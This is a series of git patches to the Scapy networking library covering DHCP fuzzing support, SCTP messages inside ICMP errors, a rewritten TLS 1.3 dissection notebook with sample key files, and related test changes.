a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -14,13 +14,15 @@ import scapy.libs.six as six if conf.crypto_valid: - from cryptography.utils import register_interface + from cryptography.utils import ( + register_interface, + CryptographyDeprecationWarning, + ) from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes, # noqa: E501 BlockCipherAlgorithm, CipherAlgorithm) from cryptography.hazmat.backends.openssl.backend import (backend, GetCipherByName) - from cryptography import CryptographyDeprecationWarning _tls_block_cipher_algs = {} From 9cb91c6071c3b118b0f4345a61a8de8aa51f56c8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 19 Jun 2022 15:26:24 +0200 Subject: [PATCH 0815/1632] dhcp: fix some random values (#3644) --- scapy/layers/dhcp.py | 66 +++++++++++++++++++++++++++++--------- test/scapy/layers/dhcp.uts | 7 ++++ 2 files changed, 58 insertions(+), 15 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 1c536b0a9ad..62fbc6ced54 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -46,7 +46,15 @@ from scapy.layers.l2 import Ether, HARDWARE_TYPES from scapy.packet import bind_layers, bind_bottom_up, Packet from scapy.utils import atol, itom, ltoa, sane, str2mac -from scapy.volatile import RandBin, RandField, RandInt, RandNum, RandNumExpo +from scapy.volatile import ( + RandBin, + RandByte, + RandField, + RandIP, + RandInt, + RandNum, + RandNumExpo, +) from scapy.arch import get_if_raw_hwaddr from scapy.sendrecv import srp1, sendp @@ -111,12 +119,28 @@ def answers(self, other): class _DHCPParamReqFieldListField(FieldListField): - def getfield(self, pkt, s): - ret = [] - while s: - s, val = FieldListField.getfield(self, pkt, s) - ret.append(val) - return b"", [x[0] for x in ret] + def randval(self): + class _RandReqFieldList(RandField): + def _fix(self): + return [RandByte()] * int(RandByte()) + return _RandReqFieldList() + + +class RandClasslessStaticRoutesField(RandField): + """ + A RandValue for classless static routes + """ + + def _fix(self): + return "%s/%d:%s" % (RandIP(), RandNum(0, 32), RandIP()) + + +class ClasslessFieldListField(FieldListField): + def randval(self): + class _RandClasslessField(RandField): + def _fix(self): + return [RandClasslessStaticRoutesField()] * int(RandNum(1, 28)) + return _RandClasslessField() class ClasslessStaticRoutesField(Field): @@ -131,6 +155,7 @@ class ClasslessStaticRoutesField(Field): Destination first byte contains one octet describing the width followed by all the significant octets of the subnet. """ + def m2i(self, pkt, x): # type: (Packet, bytes) -> str # b'\x20\x01\x02\x03\x04\t\x08\x07\x06' -> (1.2.3.4/32:9.8.7.6) @@ -153,7 +178,7 @@ def i2m(self, pkt, x): if not x: return b'' - spx = re.split('/|:', x) + spx = re.split('/|:', str(x)) prefix = int(spx[1]) # if prefix is invalid value ( 0 > prefix > 32 ) then break if prefix > 32 or prefix < 0: @@ -180,6 +205,9 @@ def getfield(self, pkt, s): def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) + def randval(self): + return RandClasslessStaticRoutesField() + # DHCP_UNKNOWN, DHCP_IP, DHCP_IPLIST, DHCP_TYPE \ # = range(4) @@ -260,7 +288,9 @@ def addfield(self, pkt, s, val): 52: ByteField("dhcp-option-overload", 100), 53: ByteEnumField("message-type", 1, DHCPTypes), 54: IPField("server_id", "0.0.0.0"), - 55: _DHCPParamReqFieldListField("param_req_list", [], ByteField("opcode", 0), length_from=lambda x: 1), # noqa: E501 + 55: _DHCPParamReqFieldListField( + "param_req_list", [], + ByteField("opcode", 0)), 56: "error_message", 57: ShortField("max_dhcp_size", 1500), 58: IntField("renewal_time", 21600), @@ -305,9 +335,10 @@ def addfield(self, pkt, s, val): 116: ByteField("auto-config", 0), 117: ShortField("name-service-search", 0,), 118: IPField("subnet-selection", "0.0.0.0"), - 121: FieldListField("classless_static_routes", - [], - ClasslessStaticRoutesField("route", 0)), + 121: ClasslessFieldListField( + "classless_static_routes", + [], + ClasslessStaticRoutesField("route", 0)), 124: "vendor_class", 125: "vendor_specific_information", 128: IPField("tftp_server_ip_address", "0.0.0.0"), @@ -362,7 +393,10 @@ def _fix(self): if isinstance(o, str): op.append((o, self.rndstr * 1)) else: - op.append((o.name, o.randval()._fix())) + r = o.randval()._fix() + if isinstance(r, bytes): + r = r[:255] + op.append((o.name, r)) return op @@ -457,8 +491,7 @@ def i2m(self, pkt, x): warning("Unknown field option %s", name) continue - s += chb(onum) - s += chb(len(oval)) + s += struct.pack("!BB", onum, len(oval)) s += oval elif (isinstance(o, str) and o in DHCPRevOptions and @@ -472,6 +505,9 @@ def i2m(self, pkt, x): warning("Malformed option %s", o) return s + def randval(self): + return RandDHCPOptions() + class DHCP(Packet): name = "DHCP options" diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 8178bdf4c3f..dd2346dd58d 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -50,6 +50,13 @@ assert s4 == b'E\x00\x01"\x00\x01\x00\x00@\x11{\xc8\x7f\x00\x00\x01\x7f\x00\x00\ s5 = raw(IP(src="127.0.0.1")/UDP()/BOOTP(chaddr="00:01:02:03:04:05")/DHCP(options=[("classless_static_routes", "192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"), "end"])) assert s5 == b'E\x00\x01 \x00\x01\x00\x00@\x11{\xca\x7f\x00\x00\x01\x7f\x00\x00\x01\x00C\x00D\x01\x0c\xabQ\x01\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000:01:02:03:04:0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x82Scy\x11 \xc0\xa8{\x04\n\x00\x00\x01\x18\xa9\xfe\xfe\n\x00\x01\x02\xff' += DHCP - fuzz + +pkt = fuzz(DHCP()) +assert isinstance(pkt.options, RandDHCPOptions) +pkt = DHCP(bytes(pkt)) +pkt.show() + = DHCP - dissection p = IP(s) From 795d4f879a88cec58d32bdc7e3ba83888ef720e0 Mon Sep 17 00:00:00 2001 From: Pierre Date: Sun, 19 Jun 2022 15:55:34 +0200 Subject: [PATCH 0816/1632] Support SCTP messages in ICMP (#3643) --- scapy/layers/sctp.py | 30 ++++++++++++++++++++++++------ test/scapy/layers/sctp.uts | 6 ++++++ 2 files changed, 30 insertions(+), 6 deletions(-) diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index 4e2d77b089a..3ef27082e56 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -35,9 +35,8 @@ XIntField, XShortField, ) -from scapy.layers.inet import IP -from scapy.layers.inet6 import IP6Field -from scapy.layers.inet6 import IPv6 +from scapy.layers.inet import IP, IPerror +from scapy.layers.inet6 import IP6Field, IPv6, IPerror6 IPPROTO_SCTP = 132 @@ -244,9 +243,9 @@ def default_payload_class(self, p): class SCTP(_SCTPChunkGuessPayload, Packet): - fields_desc = [ShortField("sport", None), - ShortField("dport", None), - XIntField("tag", None), + fields_desc = [ShortField("sport", 0), + ShortField("dport", 0), + XIntField("tag", 0), XIntField("chksum", None), ] def answers(self, other): @@ -265,6 +264,23 @@ def post_build(self, p, pay): p = p[:8] + struct.pack(">I", crc) + p[12:] return p + +class SCTPerror(SCTP): + name = "SCTP in ICMP" + + def answers(self, other): + if not isinstance(other, SCTP): + return 0 + if conf.checkIPsrc: + if not ((self.sport == other.sport) and + (self.dport == other.dport)): + return 0 + return 1 + + def mysummary(self): + return Packet.mysummary(self) + + # SCTP Chunk variable params @@ -689,4 +705,6 @@ class SCTPChunkAddressConfAck(SCTPChunkAddressConf): bind_layers(IP, SCTP, proto=IPPROTO_SCTP) +bind_layers(IPerror, SCTPerror, proto=IPPROTO_SCTP) bind_layers(IPv6, SCTP, nh=IPPROTO_SCTP) +bind_layers(IPerror6, SCTPerror, proto=IPPROTO_SCTP) diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts index d0c3114a640..2a63b98432f 100644 --- a/test/scapy/layers/sctp.uts +++ b/test/scapy/layers/sctp.uts @@ -258,3 +258,9 @@ assert(p.params == []) ~ sctp param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() assert(param1.random != param2.random) + += SCTP in ICMP +~ sctp icmp +p1 = IP(raw(IP(src=RandIP(), dst=RandIP()) / SCTP(sport=RandShort(), dport=RandShort()))) +p2 = IP(raw(IP(src=RandIP(), dst=p1[IP].src) / ICMP(type=3, code=1) / p1)) +assert(p2.answers(p1)) From c96fbb8487051e209dfee788eff857e9ca1fed72 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 18 Jun 2022 18:36:36 +0200 Subject: [PATCH 0817/1632] Update the TLS13 notebook to spec --- doc/notebooks/tls/notebook4_tls13.ipynb | 119 +++++++++++++----- .../tls/raw_data/tls_session_13/01_cli.raw | Bin 179 -> 253 bytes .../tls/raw_data/tls_session_13/02_srv.raw | Bin 19 -> 133 bytes .../tls/raw_data/tls_session_13/03_cli.raw | Bin 212 -> 0 bytes .../tls/raw_data/tls_session_13/03_srv.raw | Bin 0 -> 28 bytes .../tls/raw_data/tls_session_13/04_srv.raw | Bin 120 -> 840 bytes .../tls/raw_data/tls_session_13/05_srv.raw | Bin 661 -> 286 bytes .../tls/raw_data/tls_session_13/06_cli.raw | Bin 58 -> 0 bytes .../tls/raw_data/tls_session_13/06_srv.raw | Bin 0 -> 74 bytes .../tls/raw_data/tls_session_13/07_cli.raw | Bin 0 -> 80 bytes .../tls/raw_data/tls_session_13/07_srv.raw | Bin 24 -> 0 bytes .../tls/raw_data/tls_session_13/08_cli.raw | Bin 24 -> 26 bytes .../tls/raw_data/tls_session_13/09_srv.raw | Bin 0 -> 26 bytes .../tls/raw_data/tls_session_13/cli_key.raw | 2 +- .../tls/raw_data/tls_session_13/srv_key.raw | 1 + scapy/layers/tls/record.py | 7 +- 16 files changed, 96 insertions(+), 33 deletions(-) delete mode 100644 doc/notebooks/tls/raw_data/tls_session_13/03_cli.raw create mode 100644 doc/notebooks/tls/raw_data/tls_session_13/03_srv.raw delete mode 100644 doc/notebooks/tls/raw_data/tls_session_13/06_cli.raw create mode 100644 doc/notebooks/tls/raw_data/tls_session_13/06_srv.raw create mode 100644 doc/notebooks/tls/raw_data/tls_session_13/07_cli.raw delete mode 100644 doc/notebooks/tls/raw_data/tls_session_13/07_srv.raw create mode 100644 doc/notebooks/tls/raw_data/tls_session_13/09_srv.raw create mode 100644 doc/notebooks/tls/raw_data/tls_session_13/srv_key.raw diff --git a/doc/notebooks/tls/notebook4_tls13.ipynb b/doc/notebooks/tls/notebook4_tls13.ipynb index 84a72211c32..da27d2e6b9b 100644 --- a/doc/notebooks/tls/notebook4_tls13.ipynb +++ b/doc/notebooks/tls/notebook4_tls13.ipynb @@ -10,16 +10,22 @@ "\"Handshake" ] }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## Dissecting the handshake" + ] + }, { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": true - }, + "metadata": {}, "outputs": [], "source": [ "from scapy.all import *\n", - "load_layer('tls')" + "load_layer('tls')\n", + "conf.logLevel = logging.INFO" ] }, { @@ -28,6 +34,7 @@ "metadata": {}, "outputs": [], "source": [ + "# ClientHello\n", "record1_str = open('raw_data/tls_session_13/01_cli.raw', 'rb').read()\n", "record1 = TLS(record1_str)\n", "sess = record1.tls_session\n", @@ -40,38 +47,42 @@ "metadata": {}, "outputs": [], "source": [ - "record2_str = open('raw_data/tls_session_13/02_srv.raw', 'rb').read()\n", - "record2 = TLS(record2_str, tls_session=sess.mirror())\n", - "record2.show()" + "# The PFS relies on the ECDH secret below being kept from observers, and deleted right after the key exchange\n", + "from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\n", + "\n", + "# Used in records 2-6 + 8\n", + "x25519_client_privkey = open('raw_data/tls_session_13/cli_key.raw', 'rb').read()\n", + "sess.tls13_client_privshares[\"x25519\"] = X25519PrivateKey.from_private_bytes(x25519_client_privkey)\n", + "\n", + "# Used in records 7 + 9\n", + "x25519_server_privkey = open('raw_data/tls_session_13/srv_key.raw', 'rb').read()\n", + "sess.tls13_server_privshare[\"x25519\"] = X25519PrivateKey.from_private_bytes(x25519_server_privkey)" ] }, { "cell_type": "code", "execution_count": null, - "metadata": {}, + "metadata": { + "scrolled": true + }, "outputs": [], "source": [ - "record3_str = open('raw_data/tls_session_13/03_cli.raw', 'rb').read()\n", - "record3 = TLS(record3_str, tls_session=sess.mirror())\n", - "record3.show()" + "# ServerHello + ChangeCipherSpec (middlebox compatibility)\n", + "record2_str = open('raw_data/tls_session_13/02_srv.raw', 'rb').read()\n", + "record2 = TLS(record2_str, tls_session=sess.mirror())\n", + "record2.show()" ] }, { "cell_type": "code", "execution_count": null, - "metadata": { - "collapsed": true - }, + "metadata": {}, "outputs": [], "source": [ - "# The PFS relies on the ECDH secret below being kept from observers, and deleted right after the key exchange\n", - "#from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePrivateNumbers\n", - "#from cryptography.hazmat.backends import default_backend\n", - "#secp256r1_client_privkey = open('raw_data/tls_session_13/cli_key.raw', 'rb').read()\n", - "#pubnum = sess.tls13_client_pubshares[\"secp256r1\"].public_numbers()\n", - "#privnum = EllipticCurvePrivateNumbers(pkcs_os2ip(secp256r1_client_privkey), pubnum)\n", - "#privkey = privnum.private_key(default_backend())\n", - "#sess.tls13_client_privshares[\"secp256r1\"] = privkey" + "# Encrypted Extensions\n", + "record3_str = open('raw_data/tls_session_13/03_srv.raw', 'rb').read()\n", + "record3 = TLS(record3_str, tls_session=sess)\n", + "record3.show()" ] }, { @@ -82,8 +93,9 @@ }, "outputs": [], "source": [ + "# Certificate\n", "record4_str = open('raw_data/tls_session_13/04_srv.raw', 'rb').read()\n", - "record4 = TLS(record4_str, tls_session=sess.mirror())\n", + "record4 = TLS(record4_str, tls_session=sess)\n", "record4.show()" ] }, @@ -93,6 +105,7 @@ "metadata": {}, "outputs": [], "source": [ + "# Certificate verify\n", "record5_str = open('raw_data/tls_session_13/05_srv.raw', 'rb').read()\n", "record5 = TLS(record5_str, tls_session=sess)\n", "record5.show()" @@ -104,11 +117,57 @@ "metadata": {}, "outputs": [], "source": [ - "record6_str = open('raw_data/tls_session_13/06_cli.raw', 'rb').read()\n", - "record6 = TLS(record6_str, tls_session=sess.mirror())\n", + "# Finished\n", + "record6_str = open('raw_data/tls_session_13/06_srv.raw', 'rb').read()\n", + "record6 = TLS(record6_str, tls_session=sess)\n", "record6.show()" ] }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Client ChangeCipherSpec (middlebox compatibility) + Finished\n", + "record7_str = open('raw_data/tls_session_13/07_cli.raw', 'rb').read()\n", + "record7 = TLS(record7_str, tls_session=sess.mirror())\n", + "record7.show()" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## Dissecting some data" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": {}, + "outputs": [], + "source": [ + "# Client application data\n", + "record8_str = open('raw_data/tls_session_13/08_cli.raw', 'rb').read()\n", + "record8 = TLS(record8_str, tls_session=sess)\n", + "record8.show()" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": { + "scrolled": true + }, + "outputs": [], + "source": [ + "# Server application data\n", + "record9_str = open('raw_data/tls_session_13/09_srv.raw', 'rb').read()\n", + "record9 = TLS(record9_str, tls_session=sess.mirror())\n", + "record9.show()" + ] + }, { "cell_type": "markdown", "metadata": {}, @@ -122,21 +181,21 @@ ], "metadata": { "kernelspec": { - "display_name": "Python 2", + "display_name": "Python 3 (ipykernel)", "language": "python", - "name": "python2" + "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", - "version": 2 + "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", - "pygments_lexer": "ipython2", - "version": "2.7.13" + "pygments_lexer": "ipython3", + "version": "3.10.5" } }, "nbformat": 4, diff --git a/doc/notebooks/tls/raw_data/tls_session_13/01_cli.raw b/doc/notebooks/tls/raw_data/tls_session_13/01_cli.raw index 720269449ed53a57e3be98b3537bfca234f41849..dae6d676159d4a4aff14c522ff02fbcd4f5a5db0 100644 GIT binary patch literal 253 zcmWlTOD_Xq7=_O}?>E!8GwL=qozhktVk5dBq={c4v9KligrpS_O)UEhn%G*h_fI5P z*t%a@>RQybKI?Oy=bV5EEdrX%Ad8jlL?r5Z9kI@??w(#h-WMdoWdA@aof*uYoSvOu zTwYz@)ati)jr)hkr{|aE>)U(l(@dNrVIvJB!35)2v)Y78nswgT(>mA=AX z*PazooLqTzaqXTbMY5BoJS{qwD)qWd!lE&nL7Rb@sa}YImqCF+j)j?(nT?r=nS+Ic dm4l6ik(H5+k%^IoiIs_siHV6pmw}0q5dhUkC*}YE diff --git a/doc/notebooks/tls/raw_data/tls_session_13/02_srv.raw b/doc/notebooks/tls/raw_data/tls_session_13/02_srv.raw index 3c119721eb9aee2f65a4f1821acebad8bc381574..a44e0450df89cd769bc987b0afdf99d21685c67d 100644 GIT binary patch literal 133 zcmV;00DAux0|Nkh0ssJZ0|Rhza&vTbc6WGrdV73*et&?0f`f#GhKGoWii?bmj*lSV z;o{@u<>u$;>FVq3?e6dJ@$&QZ_4fDp`TG0({r>+G0ssIm04o3j0|Wpw03-k%03e^& nt!>ZrDUH+lZCe{E`4FH}TNH@b`1-pvnwThnwiOfu0{{U5e|SM| literal 19 acmWe*W@O-FV_@K_7h+&z&|qL<5C;GXHvtg< diff --git a/doc/notebooks/tls/raw_data/tls_session_13/03_cli.raw b/doc/notebooks/tls/raw_data/tls_session_13/03_cli.raw deleted file mode 100644 index b526cd708ef94f7f4bd08f1c7f5bcd3244e2e17a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 212 zcmWe*W@I?e$iQ%#nfd0+&fagf&TIFjEK2t0PTq6JL2~g^wLOeh2~H29MM7g37}$gv zg_(t!fXe4EFfed4Z~}#jQ;W({i~ch*07bbNI2hO%WEsR6Bp5Up+!6a{^~U`{mf+0W?*Kj7h>RLP+*W_VP<7!V`gIJVBuipU}IrqWn^PyVq{@rWnyDu MVq(x`U}9th00~?<4FCWD diff --git a/doc/notebooks/tls/raw_data/tls_session_13/03_srv.raw b/doc/notebooks/tls/raw_data/tls_session_13/03_srv.raw new file mode 100644 index 0000000000000000000000000000000000000000..c0ae12ac8bfbf61e9b14c9f8556d992387ecec56 GIT binary patch literal 28 kcmWe=?|scz$=Jzte^DUgYG#*p0HfOsG5`Po literal 0 HcmV?d00001 diff --git a/doc/notebooks/tls/raw_data/tls_session_13/04_srv.raw b/doc/notebooks/tls/raw_data/tls_session_13/04_srv.raw index 469e99d5d40558da0eb73c05841969fe1e86281c..55358cc0b4b4cbe5862414f4f2a62c9701f77bb8 100644 GIT binary patch literal 840 zcmV-O1GoGa0|Ns?y6_5{U?`{;yAX zc26y7Ifoc*z!NFKho$6Tj*Ta?80n4KM``zSoaT0elFG`B%vpVR>nI-AmXD5BOuwHB^H=bWHHz zxxjp`a&6K-nN!~%9OJC(J903G9+EK(`zr~AhV(T!_~%SR03P?38I!wha*Byw7K#9yCZDYjy0XZH7;;8Z6yN3(74 zFuf$N5Y{r=rBB4@ki7+ll8gcd$}TA6P9l0OP-7WcHQzYei8cu??*Zsctu9H{E=LM% zcSZIk>^bE8BQl(M(HAIofP6OBHo8K)X|M$URrxqj+%v)Xio249gCxgq@#_d(v%&mO z_fEh>LgpfuKBosmL5GyXh!hL7lGZ6o1wiGcociVqpz%nV{HGH$F_%a|bP z)SCY7X2gDP!b9r5yUPm#ML2i$tX;po_}dUtqsf%AB+Z(t^=krax$mOj69Thj0jp$` z=K+mwTUR^Ni_Y*PvHX&hYrLQ!oTd7bYe{gi0FeV^T(SKARU;Aqa|KwKLvRC+(#+zi zAID8^K0c}VL+;a7_V_I|&^y9Qfwhe58bj=qH|Fu>4z~4G<01WL$TKdnxH77Zd0Hpb zdB);>T44i5gNYdf_GBT@l;N-nniGwN9&dP}3e(|O094ZB1tmOjIs*P4DBkXKHY9Iq z<3llkYeuwtgFHF8(;U+P!lvzm6Pb5y2la63@CBMIXr=S67Pc2aO82)T8cmcZSo{JD zKO^pp72{w;&(?g_K$$xhAa$4f^M&eqO_}J_R{w+4AA5^W2AcwkDr2b`rw%$0;|M`m S`lY)1Fc@rWFC&h%FvmWo=b5?y literal 120 zcmV-;0Ehn;0|5YY0ssJSe-f7eX)txzMpjX&!iRJ9No7JHYom}Eo1B?-McJVyW)%|w z07(ES07U>706_$bO$p8Ajl2XIRk@@ZL&0fn#X_I@mif&YN`^Yeg7JY_@N%^F5FuTL aKz-LXi*-t}=1(jeKb=KfER>&Ts*CBei=vs(zQ#TYQ6}2Q>2s+ z`9cVu0@D?n9B&bI*Zj2_y4L;F_y0=vSqn!N!PyQFG2x-(AbIsM5R7Y|dDapG8Q`OH z0SnK+U#(Nkh|siYLuolXb^tsb2JhlfpIFI?`$&Vuo>fKXu=#3+Iaw z{?Z0z2GN>!ot-kRz(aS0nL}CcUPUGeH8yY@MgUCq{3R|_Zh3Mz$2*j;b4C$ZFdujn zn2~%k+z!rVic@(EW^VaYn%NCIc-P%YuVPKPzojP5DB{ zv7iM8l*h8aF{l>z|9A1%+lM{7Zbn9|tNL@p7o$w(Au2R!^-1Q<=Nhsprt%=H+F*k# zQ3hiIqCEn~G`(JNuurl`%162kdmqw|?wehP=CP)tp`<=IF(CyR^+7brWQNfm^AcZl zmY0QT1c%_NTnaG`znw9a>{Uarif{XI4zQ^Lg_aG$%-j&{?v`nhap``pQfe0n-*n%47U>UMNv>#sU`A1M`Z~!oIBKOFs z*1+1LWX3UrBaLznthi`-`nkG_XFO4*EP{k};~^3w%_2Cxi;9y<^W@#(4tS07I@Z`x v){A%uD#mB1R5fH3=Y@;qCNOg{nGKA?ie1Fd!YVAHz1b3KEa5$H6(&g`z`H@3 diff --git a/doc/notebooks/tls/raw_data/tls_session_13/06_cli.raw b/doc/notebooks/tls/raw_data/tls_session_13/06_cli.raw deleted file mode 100644 index 127631c031d78de9099c6e835267547a187f237a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 58 zcmV-A0LA|o0|5XvL#?glk~Sm~`*+tUv4OxFcg5MkaYT(2wREb^rhX literal 0 HcmV?d00001 diff --git a/doc/notebooks/tls/raw_data/tls_session_13/07_cli.raw b/doc/notebooks/tls/raw_data/tls_session_13/07_cli.raw new file mode 100644 index 0000000000000000000000000000000000000000..f98f681c0aaf60e8fca82c61b78ed82c592ab32d GIT binary patch literal 80 zcmV-W0I&ZP0|Nj70T%-U07akquwxfdcQPtQ-I$j1!@GhCwHHI{!e83mQ$7kQkgM2j#X{e1$_BF^}xOA?(o&D(E7bD^T literal 0 HcmV?d00001 diff --git a/doc/notebooks/tls/raw_data/tls_session_13/07_srv.raw b/doc/notebooks/tls/raw_data/tls_session_13/07_srv.raw deleted file mode 100644 index 99f5f8dd12ef4bb5b70936cbc7de5c0f1a4f0d22..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 24 gcmWe? \ No newline at end of file diff --git a/doc/notebooks/tls/raw_data/tls_session_13/srv_key.raw b/doc/notebooks/tls/raw_data/tls_session_13/srv_key.raw new file mode 100644 index 00000000000..643390219c4 --- /dev/null +++ b/doc/notebooks/tls/raw_data/tls_session_13/srv_key.raw @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index db34fb82843..c75957cd208 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -338,8 +338,11 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return _TLSEncryptedContent # Check TLS 1.3 if s and _tls_version_check(s.tls_version, 0x0304): - if (s.rcs and not isinstance(s.rcs.cipher, Cipher_NULL) and - byte0 == 0x17): + _has_cipher = lambda x: ( + x and not isinstance(x.cipher, Cipher_NULL) + ) + if (_has_cipher(s.rcs) or _has_cipher(s.prcs)) and \ + byte0 == 0x17: from scapy.layers.tls.record_tls13 import TLS13 return TLS13 if plen < 5: From d3833dc307db03271ef44bb2f5430bc97e8f6b07 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 18 Jun 2022 19:04:33 +0200 Subject: [PATCH 0818/1632] Restore TLS 1.3 --- test/configs/bsd.utsc | 1 - test/configs/linux.utsc | 1 - test/configs/windows.utsc | 1 - test/tls13.uts | 106 +++++++++++++++++++------------------- 4 files changed, 54 insertions(+), 55 deletions(-) diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 27cc5baf588..f1ac3007460 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -27,7 +27,6 @@ "kw_ko": [ "linux", "windows", - "crypto_advanced", "ipv6", "vcan_socket" ] diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index aee9a9fa522..87d6b71c649 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -27,7 +27,6 @@ "kw_ko": [ "osx", "windows", - "crypto_advanced", "ipv6" ] } diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 9b29faeafb5..0f7ad559324 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -25,7 +25,6 @@ }, "kw_ko": [ "brotli", - "crypto_advanced", "ipv6", "linux", "mock_read_routes_bsd", diff --git a/test/tls13.uts b/test/tls13.uts index 0c12b098d45..6d8463cdc45 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -396,8 +396,8 @@ assert(m[1].certs[0].cert[1].cA == False) assert(m[1].certs[0].cert[1].isSelfSigned() == True) assert(m[1].certs[0].cert[1].issuer['commonName'] == 'rsa') assert(m[1].certs[0].cert[1].keyUsage == ['digitalSignature', 'keyEncipherment']) -assert(m[1].certs[0].cert[1].notAfter_str == 'Jul 30 01:23:59 2026 GMT') -assert(m[1].certs[0].cert[1].notBefore_str == 'Jul 30 01:23:59 2016 GMT') +assert(m[1].certs[0].cert[1].notAfter_str == '2026-07-30 01:23:59 UTC') +assert(m[1].certs[0].cert[1].notBefore_str == '2016-07-30 01:23:59 UTC') assert(m[1].certs[0].cert[1].serial == 2) assert(m[1].certs[0].cert[1].sigAlg == 'sha256WithRSAEncryption') assert(m[1].certs[0].cert[1].signatureLen == 128) @@ -619,56 +619,6 @@ m = t.inner.msg[0] assert(isinstance(m, TLSApplicationData)) assert(m.data == payload) -= TLS_Ext_EncryptedServerName(), dissect -~ crypto_advanced - -from scapy.layers.tls.extensions import TLS_Ext_EncryptedServerName - -clientHello3 = clean(""" -16030102c4010002c003034b1 40e7d15fc8db422cec056fbaf 0285d306df4eedad1bc6ea57d 5114e6bd52a20a5b9c7445955 e296b886469c974648cda0a68 -5d3c06d884e388f6475c32e03 2d0024130113031302c02bc02 fcca9cca8c02cc030c00ac009 c013c01400330039002f00350 00a0100025300170000ff0100 -0100000a000e000c001d00170 018001901000101000b000201 00002300000010000b0009086 87474702f312e310005000501 000000000033006b0069001d0 -02037adee0aacc37b08d47222 caf6a5097a800fcf8406ae118 38f6348294d2dde1200170041 048b127c905d6d487a40b8b19 c99c56aa1a8c208218c178dae -02568547b2ce8f538a530b858 a7a2f608d66e148baa5693d03 c519b45017c63f48c5a4c1238 707bc002b0009080304030303 020301000d001800160403050 -3060308040805080604010501 060102030201002d00020101f fce016e1301001d0020912e86 b776ee552a6bb1e2c70d7b467 770b190432237cc743a93091d -ce24623500208bc16fdcbbc7c 8756808c94f70464d68297975 f33be90e1a200633f5eb2d4c6 101249e073bff833782e57e88 2519a53ef8bde4c94a7878a2f -8461aec57802440007c7b2dab 986d9bc79257ce00ca6a998b1 fadb0114161069d364ccebae8 dab6c88151f297daeaecfd2e1 a598a486e2efc9561298f8dd5 -f35d184f0e87768777d253e68 952b730a24b342fde10df4f8e 82afdc2f10c2481634d92015d 9d5e6a9566494735d9c079115 bdeb0cd019098d1cf847c53ef -4aac41560cacdc7ce166399df 5b0c0af91d5be3f7d8224755a aa6046de52875f9ef9ac15372 7ce08019bc2648beb4b1418cb 4979ff7eaeedaec2b15695508 -4d5a480cb939fdc7f00e6cc6f c0f9675276a9d607686c4d779 d4bb7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d4eaf 386acc17dea11e37a09f63da3 -d059243b35f449e891255ac7b 4f631509d7060f001c0002400 1 -""") -t = TLS(clientHello3) -clientESNI = t.msg[0].ext[11] -assert isinstance(clientESNI, TLS_Ext_EncryptedServerName) and clientESNI.cipher == 4865 